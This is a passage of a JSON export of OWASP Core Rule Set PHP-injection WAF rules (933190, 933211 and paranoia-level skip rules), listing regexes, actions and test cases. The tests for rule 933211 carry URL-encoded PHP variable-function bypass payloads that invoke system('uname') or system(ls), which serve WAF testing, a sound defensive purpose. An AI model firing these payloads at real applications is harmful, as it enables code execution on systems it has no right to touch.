800, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 801, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 802, "act_quote": "quotes", "act_arg": "tx.php_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 803, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 784 } }, { "rule_id": "933190", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@pm", "argument": "?>", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "PHP Injection Attack: PHP Closing Tag Found", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-injection-php" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-php", "platform-multi", "attack-injection-php", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/ATTACK-PHP", "capec/1000/152/242" ] }, "test_cases": [ { "description": "PHP Injection Attack: PHP Closing Tag Found", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Cache-Control": "no-cache, no-store, must-revalidate", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "file_test=&submit=1" }, "expected": { "should_block": true, "rule_ids": [ 933190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "file_test=&submit=1" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 814, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@pm", "operator_argument": "?>", "actions": [ { "act_name": "id", "lineno": 815, "act_quote": "no_quote", "act_arg": "933190", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 816, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 817, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 818, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 819, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 819, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 820, "act_quote": "quotes", "act_arg": "PHP Injection Attack: PHP Closing Tag Found", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 821, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 822, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 823, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 824, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 825, "act_quote": "quotes", "act_arg": "attack-injection-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 826, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 827, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 828, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 829, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 830, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 831, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 832, "act_quote": "quotes", "act_arg": "tx.php_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 833, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 814 } }, { "rule_id": "933211", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?:\\((?:.+\\)(?:[\\\"'][\\-0-9A-Z_a-z]+[\\\"'])?\\(.+|[^\\)]*string[^\\)]*\\)[\\s\\x0b\\\"'\\-\\.0-9A-\\[\\]_a-\\{\\}]+\\([^\\)]*)|(?:\\[[0-9]+\\]|\\{[0-9]+\\}|\\$[^\\(\\),\\./;\\x5c]+|[\\\"'][\\-0-9A-Z\\x5c_a-z]+[\\\"'])\\(.+)\\)(?:;|$)?", "negated": false } }, "transformations": [ "none", "urlDecodeUni", "replaceComments", "removeWhitespace" ], "metadata": { "phase": "2", "message": "PHP Injection Attack: Variable Function Call Found", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-injection-php" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-php", "platform-multi", "attack-injection-php", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/ATTACK-PHP", "capec/1000/152/242" ] }, "test_cases": [ { "description": "Check for false positive 1", "test_id": 1, "request": { "method": "GET", "uri": "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29.", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." } ] }, { "description": "Check for false positive 2", "test_id": 2, "request": { "method": "GET", "uri": "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" } ] }, { "description": "PHP Variable Function bypass \"(system)('uname')\"", "test_id": 3, "request": { "method": "GET", "uri": "/get?x=%28system%29%28%27uname%27%29%20%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28system%29%28%27uname%27%29%20%3B" } ] }, { "description": "PHP Variable Function bypass \"(sy.(st).em)('uname')\"", "test_id": 4, "request": { "method": "GET", "uri": "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"(string)'system'('uname')\"", "test_id": 5, "request": { "method": "GET", "uri": "/get?x=%28string%29%22system%22%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28string%29%22system%22%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"( string ) 'sys'.'t'.'em' ('uname')\"", "test_id": 6, "request": { "method": "GET", "uri": "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"(string) {[system][0]} ('uname')\"", "test_id": 7, "request": { "method": "GET", "uri": "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"define('x', 'sys' . 'tem');(x)/* comment */('uname')\"", "test_id": 8, "request": { "method": "GET", "uri": "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"$y = 'sys'.'tem';($y)('uname')\"", "test_id": 9, "request": { "method": "GET", "uri": "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"define('z', [['sys' .'tem']]);(z)[0][0]('uname')\"", "test_id": 10, "request": { "method": "GET", "uri": "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"(system)(ls)\"", "test_id": 11, "request": { "method": "GET", "uri": "/get?x=%28system%29%28ls%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28system%29%28ls%29%3B" } ] }, { "description": "PHP Variable Function bypass \"(/* comment */system)(ls/* comment */)\"", "test_id": 12, "request": { "method": "GET", "uri": "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" } ] }, { "description": "PHP Variable Function bypass \"[system][0](ls)\"", "test_id": 13, "request": { "method": "GET", "uri": "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%5bsystem%5d%5b0%5d%28ls%29%3B" } ] }, { "description": "PHP Variable Function bypass \"[ system ] [ 0 ] ( ls )\"", "test_id": 14, "request": { "method": "GET", "uri": "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" } ] }, { "description": "PHP Variable Function bypass \"(['system'])[0]('uname')\"", "test_id": 15, "request": { "method": "GET", "uri": "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"( [ system ][ 0 ]) {/* comment */0} ( ls )\"", "test_id": 16, "request": { "method": "GET", "uri": "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" } ] }, { "description": "Check FP if Cookie contains '/' (slash)", "test_id": 17, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Cookie": "x=(foo)/(bar)", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933211 ] }, "malicious_patterns": [] }, { "description": "Check FP if Cookie contains '/' (slash)", "test_id": 18, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Cookie": "x=(/foo)/(/bar)", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933211 ] }, "malicious_patterns": [] }, { "description": "Block function call via string", "test_id": 19, "request": { "method": "GET", "uri": "/get?code=%22system%22%28ls%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "code=%22system%22%28ls%29%3B" } ] }, { "description": "Block function call via string using hex escape sequence", "test_id": 20, "request": { "method": "GET", "uri": "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" } ] }, { "description": "Block function call bypass '(sy.(st).em)(@id)' (without trailing semi-colon)", "test_id": 21, "request": { "method": "GET", "uri": "/get?code=(sy.(st).em)(%40id)", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933211 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "code=(sy.(st).em)(%40id)" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 850, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?:\\((?:.+\\)(?:[\\\"'][\\-0-9A-Z_a-z]+[\\\"'])?\\(.+|[^\\)]*string[^\\)]*\\)[\\s\\x0b\\\"'\\-\\.0-9A-\\[\\]_a-\\{\\}]+\\([^\\)]*)|(?:\\[[0-9]+\\]|\\{[0-9]+\\}|\\$[^\\(\\),\\./;\\x5c]+|[\\\"'][\\-0-9A-Z\\x5c_a-z]+[\\\"'])\\(.+)\\)(?:;|$)?", "actions": [ { "act_name": "id", "lineno": 851, "act_quote": "no_quote", "act_arg": "933211", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 852, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 853, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 854, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 855, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 855, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 855, "act_quote": "no_quote", "act_arg": "replaceComments", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 855, "act_quote": "no_quote", "act_arg": "removeWhitespace", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 856, "act_quote": "quotes", "act_arg": "PHP Injection Attack: Variable Function Call Found", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 857, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 858, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 859, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 860, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 861, "act_quote": "quotes", "act_arg": "attack-injection-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 862, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 863, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 864, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 865, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 866, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 867, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 868, "act_quote": "quotes", "act_arg": "tx.php_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 869, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 850 } }, { "rule_id": "933017", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 872, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 872, "act_quote": "no_quote", "act_arg": "933017", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 872, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 872, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 872, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 872, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 872, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 872, "act_quote": "no_quote", "act_arg": "END-REQUEST-933-APPLICATION-ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 872 } }, { "rule_id": "933018", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 873, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 873, "act_quote": "no_quote", "act_arg": "933018", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 873, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 873, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 873, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 873, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 873, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 873, "act_quote": "no_quote", "act_arg": "END-REQUEST-933-APPLICATION-ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 873 } }, { "rule_id": "942011", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 17, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 17, "act_quote": "no_quote", "act_arg": "942011", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 17, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 17, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 17, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 17, "act_quote": "quotes", "act_arg": 